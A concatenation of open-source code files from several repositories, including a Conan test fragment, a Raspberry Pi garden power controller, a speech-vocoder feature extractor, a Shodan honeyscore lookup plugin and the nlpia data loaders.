mock.patch('subprocess.check_output', mock.MagicMock(return_value=version)):
result = detect_defaults_settings(output=Mock(),
profile_path=DEFAULT_PROFILE_NAME)
result = dict(result)
self.assertEqual("AIX", result['os'])
self.assertEqual("AIX", result['os_build'])
self.assertEqual(expected_arch, result['arch'])
self.assertEqual(expected_arch, result['arch_build'])
@parameterized.expand([
['arm64', 'armv8'],
['i386', 'x86'],
['i686', 'x86'],
['i86pc', 'x86'],
['amd64', 'x86_64'],
['aarch64', 'armv8'],
['sun4v', 'sparc']
])
def test_detect_arch(self, machine, expected_arch):
with mock.patch("platform.machine", mock.MagicMock(return_value=machine)):
result = detect_defaults_settings(output=Mock(),
profile_path=DEFAULT_PROFILE_NAME)
result = dict(result)
self.assertEqual(expected_arch, result['arch'])
self.assertEqual(expected_arch, result['arch_build'])
@mock.patch("conans.client.conf.detect._clang_compiler", return_value=("clang", "9"))
def test_detect_clang_gcc_toolchain(self, _):
output = TestBufferConanOutput()
with tools.environment_append({"CC": "clang-9 --gcc-toolchain=/usr/lib/gcc/x86_64-linux-gnu/9"}):
detect_defaults_settings(output, profile_path="./MyProfile")
self.assertIn("CC and CXX: clang-9 --gcc-toolchain", output)
def test_vs2022(self):
with mock.patch("conans.client.conf.detect._get_default_compiler",
mock.MagicMock(return_value=("Visual Studio", "17"))):
result = detect_defaults_settings(output=Mock(),
profile_path=DEFAULT_PROFILE_NAME)
result = dict(result)
self.assertEqual('msvc', result['compiler'])
self.assertEqual('19.3', result['compiler.version'])
|
GardenPi/utilities/power_controller.py
|
rjsears/GardenPi
| 220 |
66873
|
#!/usr/bin/python3
# -*- coding: utf-8 -*-
"""
power_controller.py for usage with neptune/GardenPi V1.0.0
Manages all of our power zones.
"""
VERSION = "V1.0.0 (2020-07-31)"
import sys
sys.path.append('/var/www/gardenpi_control/gardenpi')
from sqlalchemy import update, select, and_, create_engine
import system_info
from tables import power, power_scheduled_jobs, power_currently_running
from system_logging import setup_logging
from system_logging import read_logging_config
import logging
import wiringpi as mcp
mcp.wiringPiSetup() # initialise wiringpi
mcp.mcp23017Setup(96,0x25) #MCP2 GPIOs 96-111
# Instantiate SQAlchemy Database Engine
engine = create_engine(system_info.sqlalchemy_db_uri, pool_recycle=3600)
#Setup Module level logging here. Main logging config in system_logging.py
setup_logging()
level = read_logging_config('logging', 'log_level')
level = logging._checkLevel(level)
log = logging.getLogger(__name__)
log.setLevel(level)
class PowerZoneSchedule:
def __init__(self, name, job_id, zone_job, job_enabled, job_start_time, job_stop_time,
job_duration, job_running, monday, tuesday, wednesday, thursday, friday,
saturday, sunday, forced_stopped_manually):
self.name = name
self.job_id = job_id
self.zone_job = zone_job
self.job_enabled = job_enabled
self.job_start_time = job_start_time
self.job_stop_time = job_stop_time
self.job_duration = job_duration
self.job_running = job_running
self.monday = monday
self.tuesday = tuesday
self.wednesday = wednesday
self.thursday = thursday
self.friday = friday
self.saturday = saturday
self.sunday = sunday
self.forced_stopped_manually = forced_stopped_manually
@classmethod
def config_powerzoneschedule(cls, zone_name):
with engine.begin() as conn:
stmt = select([power_scheduled_jobs]).where(power_scheduled_jobs.c.zone.in_(zone_name))
return [
cls(
name=row[power_scheduled_jobs.c.zone],
job_id=row[power_scheduled_jobs.c.job_id],
zone_job=row[power_scheduled_jobs.c.zone_job],
job_enabled=row[power_scheduled_jobs.c.job_enabled],
job_start_time=row[power_scheduled_jobs.c.job_start_time],
job_stop_time=row[power_scheduled_jobs.c.job_stop_time],
job_duration=row[power_scheduled_jobs.c.job_duration],
job_running=row[power_scheduled_jobs.c.job_running],
monday=row[power_scheduled_jobs.c.monday],
tuesday=row[power_scheduled_jobs.c.tuesday],
wednesday=row[power_scheduled_jobs.c.wednesday],
thursday=row[power_scheduled_jobs.c.thursday],
friday=row[power_scheduled_jobs.c.friday],
saturday=row[power_scheduled_jobs.c.saturday],
sunday=row[power_scheduled_jobs.c.sunday],
forced_stopped_manually=row[power_scheduled_jobs.c.forced_stop_manually]
)
for row in conn.execute(stmt).fetchall()
]
def sa_read_powerzone_schedule_by_zonejob(self, zone_name, zone_job):
'''
Uses SQLAlchemy to connect to db and return all jobs by job number.
'''
with engine.begin() as conn:
return (conn.execute(select([power_scheduled_jobs]).where(and_(power_scheduled_jobs.c.zone == (zone_name),
power_scheduled_jobs.c.zone_job == (zone_job))))).fetchall()
def sa_read_powerzone_schedule_by_zonejobday(self, zone_name, zone_job, day):
'''
Uses SQLAlchemy to connect to db and return all jobs by job number and day.
'''
with engine.begin() as conn:
results = (conn.execute(select([power_scheduled_jobs]).where(and_(power_scheduled_jobs.c.zone == (zone_name),
power_scheduled_jobs.c.zone_job == (zone_job),
power_scheduled_jobs.c.job_enabled == (True),
getattr(power_scheduled_jobs.c, day) == (True))))).fetchall()
return (results)
def sa_read_zone_schedule_by_zone(self, zone_name):
with engine.begin() as conn:
results = (conn.execute(select([power_scheduled_jobs]).where(power_scheduled_jobs.c.zone == zone_name))).fetchall()
return (results)
def update_day(self, zone_name, zone_job, day_of_week, value):
with engine.begin() as conn:
conn.execute(power_scheduled_jobs.update().where(and_(power_scheduled_jobs.c.zone == (zone_name),
power_scheduled_jobs.c.zone_job == (zone_job))).values({getattr(power_scheduled_jobs.c, day_of_week): value}))
def update_job_start_time(self, zone_name, zone_job, job_start_time):
with engine.begin() as conn:
conn.execute(power_scheduled_jobs.update().where(and_(power_scheduled_jobs.c.zone == (zone_name),
power_scheduled_jobs.c.zone_job == (zone_job))).values({power_scheduled_jobs.c.job_start_time: job_start_time}))
def update_job_stop_time(self, zone_name, zone_job, job_stop_time):
with engine.begin() as conn:
conn.execute(power_scheduled_jobs.update().where(and_(power_scheduled_jobs.c.zone == (zone_name),
power_scheduled_jobs.c.zone_job == (zone_job))).values({power_scheduled_jobs.c.job_stop_time: job_stop_time}))
def toggle_job(self, zone_name, zone_job):
with engine.begin() as conn:
job_enabled = (self.sa_read_powerzone_schedule_by_zonejob(zone_name, zone_job)[0][3])
if job_enabled:
conn.execute(power_scheduled_jobs.update().where(and_(power_scheduled_jobs.c.zone == (zone_name),
power_scheduled_jobs.c.zone_job == (zone_job))).values({power_scheduled_jobs.c.job_enabled: False}))
else:
conn.execute(power_scheduled_jobs.update().where(and_(power_scheduled_jobs.c.zone == (zone_name),
power_scheduled_jobs.c.zone_job == (zone_job))).values({power_scheduled_jobs.c.job_enabled: True}))
def update_job_duration(self, zone_name, zone_job, job_duration):
with engine.begin() as conn:
conn.execute(power_scheduled_jobs.update().where(and_(power_scheduled_jobs.c.zone == (zone_name),
power_scheduled_jobs.c.zone_job == (zone_job))).values({power_scheduled_jobs.c.job_duration: job_duration}))
class PowerController:
def __init__(self, name, number, description, gpio, enabled, running, running_manually, mcp, notifications, sms, pb, email):
self.zone_name = name
self.zone_number = number
self.description = description
self.gpio = gpio
self.enabled = enabled
self.running = running
self.running_manually = running_manually
self.mcp = mcp
self.notifications = notifications
self.sms = sms
self.pb = pb
self.email = email
@classmethod
def read_config(cls, zone_name):
with engine.begin() as conn:
stmt = select([power]).where(power.c.zone_name.in_(zone_name))
return [
cls(
name=row[power.c.zone_name],
number=row[power.c.zone_number],
description=row[power.c.description],
gpio=row[power.c.gpio],
enabled=row[power.c.enabled],
running=row[power.c.running],
running_manually=row[power.c.running_manually],
mcp=row[power.c.mcp],
notifications=row[power.c.notifications],
sms=row[power.c.sms],
pb=row[power.c.pb],
email=row[power.c.email]
)
for row in conn.execute(stmt).fetchall()
]
def run_job(self, job_id):
with engine.begin() as conn:
enabled = (conn.execute(select([power.c.enabled]).where(power.c.zone_name == self.zone_name))).scalar()
if enabled:
with engine.begin() as conn:
running = (conn.execute(select([power.c.running]).where(power.c.zone_name == self.zone_name))).scalar()
if running:
log.debug(f'Zone {self.zone_number} ({self.zone_name}) is already running.')
else:
self.running = True
with engine.begin() as conn:
# With this db update we are updating the individual zone db record for the zone that is running.
conn.execute(power.update().where(power.c.zone_name == self.zone_name).values({power.c.running: True}))
conn.execute(power.update().where(power.c.zone_name == self.zone_name).values({power.c.running_manually: False}))
conn.execute(power_scheduled_jobs.update().where(power_scheduled_jobs.c.job_id == job_id).values({power_scheduled_jobs.c.job_running: True}))
# With this db update we are updating the system_wide indication that "a" or "any" zone is running.
# To access this, call use_database.zones_running_now() and it will return True or False on a systemwide
# basis.
conn.execute(power_currently_running.update().where(power_currently_running.c.zone_name == self.zone_name).values({power_currently_running.c.currently_running: True}))
conn.execute(power_currently_running.update().where(power_currently_running.c.zone_name == self.zone_name).values({power_currently_running.c.run_manually: False}))
conn.execute(power_currently_running.update().where(power_currently_running.c.zone_name == self.zone_name).values({power_currently_running.c.run_by_job: True}))
conn.execute(power_currently_running.update().where(power_currently_running.c.zone_name == self.zone_name).values({power_currently_running.c.job_id: job_id}))
mcp.pinMode(self.gpio, 1)
mcp.digitalWrite(self.gpio, 1)
log.debug(f'Zone {self.zone_number} ({self.zone_name}) is now RUNNING.')
else:
log.debug(f'ERROR: Zone {self.zone_number} ({self.zone_name}) is DISABLED. Please enable it first.')
def run(self):
with engine.begin() as conn:
enabled = (conn.execute(select([power.c.enabled]).where(power.c.zone_name == self.zone_name))).scalar()
if enabled:
with engine.begin() as conn:
running = (conn.execute(select([power.c.running]).where(power.c.zone_name == self.zone_name))).scalar()
if running:
log.debug(f'Zone {self.zone_number} ({self.zone_name}) is already running.')
else:
self.running = True
with engine.begin() as conn:
# With this db update we are updating the individual zone db record for the zone that is running.
conn.execute(power.update().where(power.c.zone_name == self.zone_name).values({power.c.running: True}))
conn.execute(power.update().where(power.c.zone_name == self.zone_name).values({power.c.running_manually: True}))
# With this db update we are updating the system_wide indication that "a" or "any" zone is running.
# To access this, call use_database.zones_running_now() and it will return True or False on a systemwide
# basis.
conn.execute(power_currently_running.update().where(power_currently_running.c.zone_name == self.zone_name).values({power_currently_running.c.currently_running: True}))
conn.execute(power_currently_running.update().where(power_currently_running.c.zone_name == self.zone_name).values({power_currently_running.c.run_manually: True}))
conn.execute(power_currently_running.update().where(power_currently_running.c.zone_name == self.zone_name).values({power_currently_running.c.run_by_job: False}))
conn.execute(power_currently_running.update().where(power_currently_running.c.zone_name == self.zone_name).values({power_currently_running.c.job_id: 0}))
mcp.pinMode(self.gpio, 1)
mcp.digitalWrite(self.gpio, 1)
log.debug(f'Zone {self.zone_number} ({self.zone_name}) is now RUNNING.')
else:
log.debug(f'ERROR: Zone {self.zone_number} ({self.zone_name}) is DISABLED. Please enable it first.')
def stop_job(self, job_id, forced):
with engine.begin() as conn:
running = (conn.execute(select([power.c.running]).where(power.c.zone_name == self.zone_name))).scalar()
if running:
self.running = power
with engine.begin() as conn:
# With this db update we are updating the individual zone db record for the zone that is running.
conn.execute(power.update().where(power.c.zone_name == self.zone_name).values({power.c.running: False}))
conn.execute(power.update().where(power.c.zone_name == self.zone_name).values({power.c.running_manually: False}))
conn.execute(power_scheduled_jobs.update().where(power_scheduled_jobs.c.job_id == job_id).values({power_scheduled_jobs.c.job_running: False}))
if forced:
conn.execute(power_scheduled_jobs.update().where(power_scheduled_jobs.c.job_id == job_id).values({power_scheduled_jobs.c.forced_stop_manually: True}))
conn.execute(power_currently_running.update().where(power_currently_running.c.zone_name == self.zone_name).values({power_currently_running.c.force_stopped: True}))
# With this db update we are updating the system_wide indication that "a" or "any" zone is running.
# To access this, call use_database.zones_running_now() and it will return True or False on a systemwide
# basis.
conn.execute(power_currently_running.update().where(power_currently_running.c.zone_name == self.zone_name).values({power_currently_running.c.currently_running: False}))
conn.execute(power_currently_running.update().where(power_currently_running.c.zone_name == self.zone_name).values({power_currently_running.c.run_manually: False}))
conn.execute(power_currently_running.update().where(power_currently_running.c.zone_name == self.zone_name).values({power_currently_running.c.run_by_job: False}))
conn.execute(power_currently_running.update().where(power_currently_running.c.zone_name == self.zone_name).values({power_currently_running.c.job_id: 0}))
mcp.digitalWrite(self.gpio, 0)
log.debug(f'Zone {self.zone_number} ({self.zone_name}) is now STOPPED.')
else:
log.debug(f'Zone {self.zone_number} ({self.zone_name}) is not currently running!!.')
def stop(self):
with engine.begin() as conn:
enabled = (conn.execute(select([power.c.enabled]).where(power.c.zone_name == self.zone_name))).scalar()
if enabled:
with engine.begin() as conn:
running = (conn.execute(select([power.c.running]).where(power.c.zone_name == self.zone_name))).scalar()
if running:
self.running = False
with engine.begin() as conn:
# With this db update we are updating the individual zone db record for the zone that is running.
conn.execute(power.update().where(power.c.zone_name == self.zone_name).values({power.c.running: False}))
conn.execute(power.update().where(power.c.zone_name == self.zone_name).values({power.c.running_manually: False}))
# With this db update we are updating the system_wide indication that "a" or "any" zone is running.
# To access this, call use_database.zones_running_now() and it will return True or False on a systemwide
# basis.
conn.execute(power_currently_running.update().where(power_currently_running.c.zone_name == self.zone_name).values({power_currently_running.c.currently_running: False}))
conn.execute(power_currently_running.update().where(power_currently_running.c.zone_name == self.zone_name).values({power_currently_running.c.run_manually: False}))
conn.execute(power_currently_running.update().where(power_currently_running.c.zone_name == self.zone_name).values({power_currently_running.c.run_by_job: False}))
conn.execute(power_currently_running.update().where(power_currently_running.c.zone_name == self.zone_name).values({power_currently_running.c.job_id: 0}))
mcp.digitalWrite(self.gpio, 0)
log.debug(f'Zone {self.zone_number} ({self.zone_name}) is now STOPPED.')
else:
log.debug(f'Zone {self.zone_number} ({self.zone_name}) is not currently running.')
else:
log.debug(f'ERROR: Zone {self.zone_number} ({self.zone_name}) is DISABLED. Please enable it first.')
def enable(self):
with engine.begin() as conn:
enabled = (conn.execute(select([power.c.enabled]).where(power.c.zone_name == self.zone_name))).scalar()
if enabled:
log.debug(f'Zone {self.zone_number} ({self.zone_name}) is already enabled.')
else:
self.enabled = True
with engine.begin() as conn:
conn.execute(power.update().where(power.c.zone_name == self.zone_name).values({power.c.enabled: True}))
log.debug(f'Zone {self.zone_number} ({self.zone_name}) has been enabled.')
def disable(self):
with engine.begin() as conn:
enabled = (conn.execute(select([power.c.enabled]).where(power.c.zone_name == self.zone_name))).scalar()
if enabled:
with engine.begin() as conn:
running = (conn.execute(select([power.c.running]).where(power.c.zone_name == self.zone_name))).scalar()
if running:
log.debug(f'Zone {self.zone_number} ({self.zone_name}) is currently running.')
log.debug(f'Shutting off Zone {self.zone_number} ({self.zone_name}) before disabling.')
self.stop()
self.enabled = False
with engine.begin() as conn:
conn.execute(power.update().where(power.c.zone_name == self.zone_name).values({power.c.enabled: False}))
log.debug(f'Zone {self.zone_number} ({self.zone_name}) has been disbled.')
else:
log.debug(f'Zone {self.zone_number} ({self.zone_name}) is already disabled.')
def notification_toggle(self, notification):
with engine.begin() as conn:
if getattr(self, notification):
conn.execute(power.update().where(power.c.zone_name == self.zone_name).values({notification: False}))
setattr(self, notification, False)
log.debug(f'System Notifications: ({notification}) for Zone {self.zone_number} ({self.zone_name}) Disabled.')
else:
conn.execute(power.update().where(power.c.zone_name == self.zone_name).values({notification: True}))
setattr(self, notification, True)
log.debug(f'System Notifications: ({notification}) for Zone {self.zone_number} ({self.zone_name}) Enabled.')
def main():
print("Not intended to be run directly.")
print("This is the systemwide PowerController module.")
print("It is called by other modules.")
exit()
if __name__ == '__main__':
main()
|
skhep/utils/__init__.py
|
scikit-hep/scikit-hep
| 150 |
66875
|
# -*- coding: utf-8 -*-
# Licensed under a 3-clause BSD style license, see LICENSE.
"""
Module for miscellaneous and general utilities.
"""
from .exceptions import *
|
misc/scripts/vocoder/straight/extract_features_for_merlin.py
|
G-Thor/merlin
| 1,305 |
66911
|
<filename>misc/scripts/vocoder/straight/extract_features_for_merlin.py
import os
import sys
import shutil
import glob
import time
import multiprocessing as mp
if len(sys.argv)!=5:
print("Usage: ")
print("python extract_features_for_merlin.py <path_to_merlin_dir> <path_to_wav_dir> <path_to_feat_dir> <sampling rate>")
sys.exit(1)
# top merlin directory
merlin_dir = sys.argv[1]
# input audio directory
wav_dir = sys.argv[2]
# Output features directory
out_dir = sys.argv[3]
# initializations
fs = int(sys.argv[4])
# tools directory
straight = os.path.join(merlin_dir, "tools/bin/straight")
sptk = os.path.join(merlin_dir, "tools/bin/SPTK-3.9")
raw_dir = os.path.join(out_dir, 'raw' )
sp_dir = os.path.join(out_dir, 'sp' )
mgc_dir = os.path.join(out_dir, 'mgc')
bap_dir = os.path.join(out_dir, 'bap')
ap_dir = os.path.join(out_dir, 'ap')
f0_dir = os.path.join(out_dir, 'f0' )
lf0_dir = os.path.join(out_dir, 'lf0')
if not os.path.exists(out_dir):
os.mkdir(out_dir)
if not os.path.exists(raw_dir):
os.mkdir(raw_dir)
if not os.path.exists(sp_dir):
os.mkdir(sp_dir)
if not os.path.exists(mgc_dir):
os.mkdir(mgc_dir)
if not os.path.exists(bap_dir):
os.mkdir(bap_dir)
if not os.path.exists(ap_dir):
os.mkdir(ap_dir)
if not os.path.exists(f0_dir):
os.mkdir(f0_dir)
if not os.path.exists(lf0_dir):
os.mkdir(lf0_dir)
if fs == 16000:
nFFT = 1024
alpha = 0.58
elif fs == 48000:
nFFT = 4096
alpha = 0.77
else:
print("As of now, we don't support %d Hz sampling rate." %(fs))
print("Please consider either downsampling to 16000 Hz or upsampling to 48000 Hz")
sys.exit(1)
mcsize = 59
order = 24
nFFTHalf = 1 + nFFT / 2
fshift = 5
def get_wav_filelist(wav_dir):
wav_files = []
for file in os.listdir(wav_dir):
whole_filepath = os.path.join(wav_dir,file)
if os.path.isfile(whole_filepath) and str(whole_filepath).endswith(".wav"):
wav_files.append(whole_filepath)
elif os.path.isdir(whole_filepath):
wav_files += get_wav_filelist(whole_filepath)
wav_files.sort()
return wav_files
def process(filename):
'''
The function decomposes a wav file into F0, mel-cepstral coefficients, and band aperiodicity
:param filename: path to wav file
:return: .lf0, .mgc and .bap files
'''
file_id = os.path.basename(filename).split(".")[0]
print(file_id)
sox_wav_2_raw_cmd = 'sox %s -b 16 -c 1 -r %s -t raw %s' % (filename,\
fs,\
os.path.join(raw_dir, file_id + '.raw'))
os.system(sox_wav_2_raw_cmd)
### STRAIGHT ANALYSIS -- extract vocoder parameters ###
### extract f0, sp, ap ###
straight_f0_analysis_cmd = "%s -nmsg -maxf0 400 -uf0 400 -minf0 50 -lf0 50 -f0shift %s -f %s -raw %s %s" % (os.path.join(straight, 'tempo'), \
fshift, fs, \
os.path.join(raw_dir, file_id + '.raw'), \
os.path.join(f0_dir, file_id + '.f0'))
os.system(straight_f0_analysis_cmd)
straight_ap_analysis_cmd = "%s -nmsg -f %s -fftl %s -apord %s -shift %s -f0shift %s -float -f0file %s -raw %s %s" % (os.path.join(straight, 'straight_bndap'),\
fs, nFFT, nFFTHalf, fshift, fshift,\
os.path.join(f0_dir, file_id + '.f0'), \
os.path.join(raw_dir, file_id + '.raw'), \
os.path.join(ap_dir, file_id + '.ap'))
os.system(straight_ap_analysis_cmd)
straight_sp_analysis_cmd = "%s -nmsg -f %s -fftl %s -apord %s -shift %s -f0shift %s -order %s -f0file %s -pow -float -raw %s %s" % (os.path.join(straight, 'straight_mcep'),\
fs, nFFT, nFFTHalf, fshift, fshift, mcsize, \
os.path.join(f0_dir,file_id + '.f0'), \
os.path.join(raw_dir,file_id + '.raw'), \
os.path.join(sp_dir,file_id + '.sp'))
os.system(straight_sp_analysis_cmd)
### convert f0 to lf0 ###
sptk_x2x_af_cmd = "%s +af %s | %s > %s " % (os.path.join(sptk, 'x2x'), \
os.path.join(f0_dir, file_id + '.f0'), \
os.path.join(sptk, 'sopr') + ' -magic 0.0 -LN -MAGIC -1.0E+10', \
os.path.join(lf0_dir, file_id + '.lf0'))
os.system(sptk_x2x_af_cmd)
### convert sp to mgc ###
sptk_mcep = "%s -a %s -m %s -l %s -e 1.0E-8 -j 0 -f 0.0 -q 3 %s > %s" % (os.path.join(sptk, 'mcep'),\
alpha, mcsize, nFFT,\
os.path.join(sp_dir, file_id+'.sp'),\
os.path.join(mgc_dir, file_id+'.mgc'))
os.system(sptk_mcep)
### convert ap to bap ###
sptk_mcep = "%s -a %s -m %s -l %s -e 1.0E-8 -j 0 -f 0.0 -q 1 %s > %s" % (os.path.join(sptk, 'mcep'),\
alpha, order, nFFT,\
os.path.join(ap_dir, file_id+'.ap'),\
os.path.join(bap_dir, file_id+'.bap'))
os.system(sptk_mcep)
print("--- Feature extraction started ---")
start_time = time.time()
# get wav files list
wav_files = get_wav_filelist(wav_dir)
# do multi-processing
pool = mp.Pool(mp.cpu_count())
pool.map(process, wav_files)
# clean temporal files
shutil.rmtree(raw_dir, ignore_errors=True)
shutil.rmtree(sp_dir, ignore_errors=True)
shutil.rmtree(f0_dir, ignore_errors=True)
shutil.rmtree(ap_dir, ignore_errors=True)
print("You should have your features ready in: "+out_dir)
(m, s) = divmod(int(time.time() - start_time), 60)
print(("--- Feature extraction completion time: %d min. %d sec ---" % (m, s)))
|
plugins/honeypot.py
|
Appnet1337/OSINT-SAN
| 313 |
66920
|
#Developer by Bafomet
# -*- coding: utf-8 -*-
import requests
from settings import shodan_api
# color
R = "\033[31m" # Red
G = "\033[1;34m" # Blue
C = "\033[1;32m" # Green
W = "\033[0m" # white
O = "\033[45m" # Purple
def honeypot(inp):
url = f"https://api.shodan.io/labs/honeyscore/{inp}"
try:
result = requests.get(url, params={"key": shodan_api}).text
except:
print(f"\nНет доступной информации!")
return
if "error" in result or "404" in result:
print("IP не найден")
return
elif result:
probability = str(float(result) * 10)
print(f"{G} [ + ]{R} Вероятность что это Honeypot : {probability}%")
print()
print(f"{G} На Shodan проверил, там тоже пусто.")
else:
print(" Что-то пошло не так ")
|
src/nlpia/loaders.py
|
AAAI-DISIM-UnivAQ/nlpia
| 532 |
66940
|
<filename>src/nlpia/loaders.py
#!/usr/bin/env python
# -*- coding: utf-8 -*-
""" Loaders and downloaders for data files and models required for the examples in NLP in Action
>>> df = get_data('cities_us')
>>> df.iloc[:3,:2]
geonameid city
131484 4295856 Indian Hills Cherokee Section
137549 5322551 Agoura
134468 4641562 Midway
Google N-Gram Viewer data (at least the 1-grams) is available with get_data as well.
The smallest 1-gram table is for the "first letter" pos (part of speech tags all alone):
>>> df = get_data('1gram_pos')
>>> df
term_pos year term_freq book_freq
0 _ADP_ 1505 3367 1
1 _ADP_ 1507 4619 1
2 _ADP_ 1515 37423 1
...
The words that start with X is also a pretty small list:
>>> df = get_data('1gram_x')
>>> df
term_pos year term_freq book_freq
0 X'rays 1914 1 1
1 X'rays 1917 1 1
2 X'rays 1919 1 1
3 X'rays 1921 1 1
...
[3929235 rows x 4 columns]
"""
from __future__ import print_function, unicode_literals, division, absolute_import
from builtins import (bytes, dict, int, list, object, range, str, # noqa
ascii, chr, hex, input, next, oct, open, pow, round, super, filter, map, zip)
from future import standard_library
standard_library.install_aliases() # noqa
from past.builtins import basestring
# from traceback import format_exc
import os
import re
import json
import logging
import shutil
from traceback import format_exc
from zipfile import ZipFile
from math import ceil
from itertools import product, zip_longest
from requests.exceptions import ConnectionError, InvalidURL, InvalidSchema, InvalidHeader, MissingSchema
from urllib.error import URLError
from copy import deepcopy
import pandas as pd
import tarfile
import ftplib
import spacy
from gensim.models import KeyedVectors
from gensim.models.keyedvectors import REAL, Vocab
from gensim.scripts.glove2word2vec import glove2word2vec
from pugnlp.util import clean_columns
from nlpia.constants import DATA_PATH, BIGDATA_PATH
from nlpia.constants import DATA_INFO_FILE, BIGDATA_INFO_FILE, BIGDATA_INFO_LATEST
from nlpia.constants import INT_MIN, INT_NAN, MIN_DATA_FILE_SIZE
from nlpia.constants import EOL # noqa (not used)
from nlpia.constants import tqdm, no_tqdm
from nlpia.futil import mkdir_p, path_status, find_files # from pugnlp.futil
from nlpia.futil import find_filepath, expand_filepath, normalize_filepath, normalize_ext, ensure_open
from nlpia.futil import read_json, read_text, read_csv
from nlpia.web import get_url_filemeta
from nlpia.web import dropbox_basename, get_url_title, try_parse_url # noqa (not used)
from nlpia.web import requests_get
import ipdb
_parse = None # placeholder for SpaCy parser + language model
np = pd.np
log = logging.getLogger(__name__)
log.setLevel(logging.DEBUG)
# logging.config.dictConfig(LOGGING_CONFIG)
# # doesn't display line number, etc
# if os.environ.get('DEBUG'):
# logging.basicConfig(level=logging.DEBUG)
# SMALLDATA_URL = 'http://totalgood.org/static/data'
W2V_FILES = [
'GoogleNews-vectors-negative300.bin.gz',
'glove.6B.zip',
'glove.twitter.27B.zip',
'glove.42B.300d.zip',
'glove.840B.300d.zip',
]
# You probably want to `rm nlpia/src/nlpia/data/bigdata_info.csv` if you modify any of these
# so they don't overwrite what you hardcode within loaders.py here:
ZIP_FILES = {
'GoogleNews-vectors-negative300.bin.gz': None,
'glove.6B.zip': ['glove.6B.50d.w2v.txt', 'glove.6B.100d.w2v.txt', 'glove.6B.200d.w2v.txt', 'glove.6B.300d.w2v.txt'],
'glove.twitter.27B.zip': None,
'glove.42B.300d.zip': None,
'glove.840B.300d.zip': None,
}
ZIP_PATHS = [[os.path.join(BIGDATA_PATH, fn) for fn in ZIP_FILES[k]] if ZIP_FILES[k] else k for k in ZIP_FILES.keys()]
harry_docs = ["The faster Harry got to the store, the faster and faster Harry would get home.",
"Harry is hairy and faster than Jill.",
"Jill is not as hairy as Harry."]
def load_imdb_df(dirpath=os.path.join(BIGDATA_PATH, 'aclImdb'), subdirectories=(('train', 'test'), ('pos', 'neg', 'unsup'))):
""" Walk directory tree starting at `path` to compile a DataFrame of movie review text labeled with their 1-10 star ratings
Returns:
DataFrame: columns=['url', 'rating', 'text'], index=MultiIndex(['train_test', 'pos_neg_unsup', 'id'])
TODO:
Make this more robust/general by allowing the subdirectories to be None and find all the subdirs containing txt files
>> imdb_df().head()
url rating text
index0 index1 index2
train pos 0 http://www.imdb.com/title/tt0453418 9 Bromwell High is a cartoon comedy. It ran at t...
1 http://www.imdb.com/title/tt0210075 7 If you like adult comedy cartoons, like South ...
2 http://www.imdb.com/title/tt0085688 9 Bromwell High is nothing short of brilliant. E...
3 http://www.imdb.com/title/tt0033022 10 "All the world's a stage and its people actors...
4 http://www.imdb.com/title/tt0043137 8 FUTZ is the only show preserved from the exper...
"""
dfs = {}
for subdirs in tqdm(list(product(*subdirectories))):
urlspath = os.path.join(dirpath, subdirs[0], 'urls_{}.txt'.format(subdirs[1]))
if not os.path.isfile(urlspath):
if subdirs != ('test', 'unsup'): # test/ dir doesn't usually have an unsup subdirectory
log.warning('Unable to find expected IMDB review list of URLs: {}'.format(urlspath))
continue
df = pd.read_csv(urlspath, header=None, names=['url'])
# df.index.name = 'id'
df['url'] = series_strip(df.url, endswith='/usercomments')
textsdir = os.path.join(dirpath, subdirs[0], subdirs[1])
if not os.path.isdir(textsdir):
log.warning('Unable to find expected IMDB review text subdirectory: {}'.format(textsdir))
continue
filenames = [fn for fn in os.listdir(textsdir) if fn.lower().endswith('.txt')]
df['index0'] = subdirs[0] # TODO: column names more generic so will work on other datasets
df['index1'] = subdirs[1]
df['index2'] = np.array([int(fn[:-4].split('_')[0]) for fn in filenames])
df['rating'] = np.array([int(fn[:-4].split('_')[1]) for fn in filenames])
texts = []
for fn in filenames:
with ensure_open(os.path.join(textsdir, fn)) as f:
texts.append(f.read())
df['text'] = np.array(texts)
del texts
df.set_index('index0 index1 index2'.split(), inplace=True)
df.sort_index(inplace=True)
dfs[subdirs] = df
return pd.concat(dfs.values())
def load_glove(filepath, batch_size=1000, limit=None, verbose=True):
r""" Load a pretrained GloVE word vector model
First header line of GloVE text file should look like:
400000 50\n
First vector of GloVE text file should look like:
the .12 .22 .32 .42 ... .42
>>> wv = load_glove(os.path.join(BIGDATA_PATH, 'glove_test.txt'))
>>> wv.most_similar('and')[:3]
[(',', 0.92...),
('.', 0.91...),
('of', 0.86...)]
"""
num_dim = isglove(filepath)
tqdm_prog = tqdm if verbose else no_tqdm
wv = KeyedVectors(num_dim)
if limit:
vocab_size = int(limit)
else:
with ensure_open(filepath) as fin:
for i, line in enumerate(fin):
pass
vocab_size = i + 1
wv.vectors = np.zeros((vocab_size, num_dim), REAL)
with ensure_open(filepath) as fin:
batch, words = [], []
for i, line in enumerate(tqdm_prog(fin, total=vocab_size)):
line = line.split()
word = line[0]
vector = np.array(line[1:]).astype(float)
# words.append(word)
# batch.append(vector)
wv.index2word.append(word)
wv.vocab[word] = Vocab(index=i, count=vocab_size - i)
wv.vectors[i] = vector
if len(words) >= batch_size:
# wv[words] = np.array(batch)
batch, words = [], []
if i >= vocab_size - 1:
break
if words:
wv[words] = np.array(batch)
return wv
def load_glove_df(filepath, **kwargs):
""" Load a GloVE-format text file into a dataframe
>>> df = load_glove_df(os.path.join(BIGDATA_PATH, 'glove_test.txt'))
>>> df.index[:3]
Index(['the', ',', '.'], dtype='object', name=0)
>>> df.iloc[0][:3]
1 0.41800
2 0.24968
3 -0.41242
Name: the, dtype: float64
"""
pdkwargs = dict(index_col=0, header=None, sep=r'\s', skiprows=[0], verbose=False, engine='python')
pdkwargs.update(kwargs)
return pd.read_csv(filepath, **pdkwargs)
# def load_glove_format(filepath):
# """ https://stackoverflow.com/questions/37793118/load-pretrained-glove-vectors-in-python#45894001 """
# # glove_input_file = os.path.join(BIGDATA_PATH, filepath)
# word2vec_output_file = os.path.join(BIGDATA_PATH, filepath.split(os.path.sep)[-1][:-4] + '.w2v.txt')
# if not os.path.isfile(word2vec_output_file): # TODO: also check file size
# glove2word2vec(glove_input_file=filepath, word2vec_output_file=word2vec_output_file)
# return KeyedVectors.load_word2vec_format(word2vec_output_file)
def get_en2fr(url='http://www.manythings.org/anki/fra-eng.zip'):
""" Download and parse English->French translation dataset used in Keras seq2seq example """
download_unzip(url)
return pd.read_table(url, compression='zip', header=None, skip_blank_lines=True, sep='\t', skiprows=0, names='en fr'.split())
def load_anki_df(language='deu'):
""" Load into a DataFrame statements in one language along with their translation into English
>>> df = get_data('zsm')
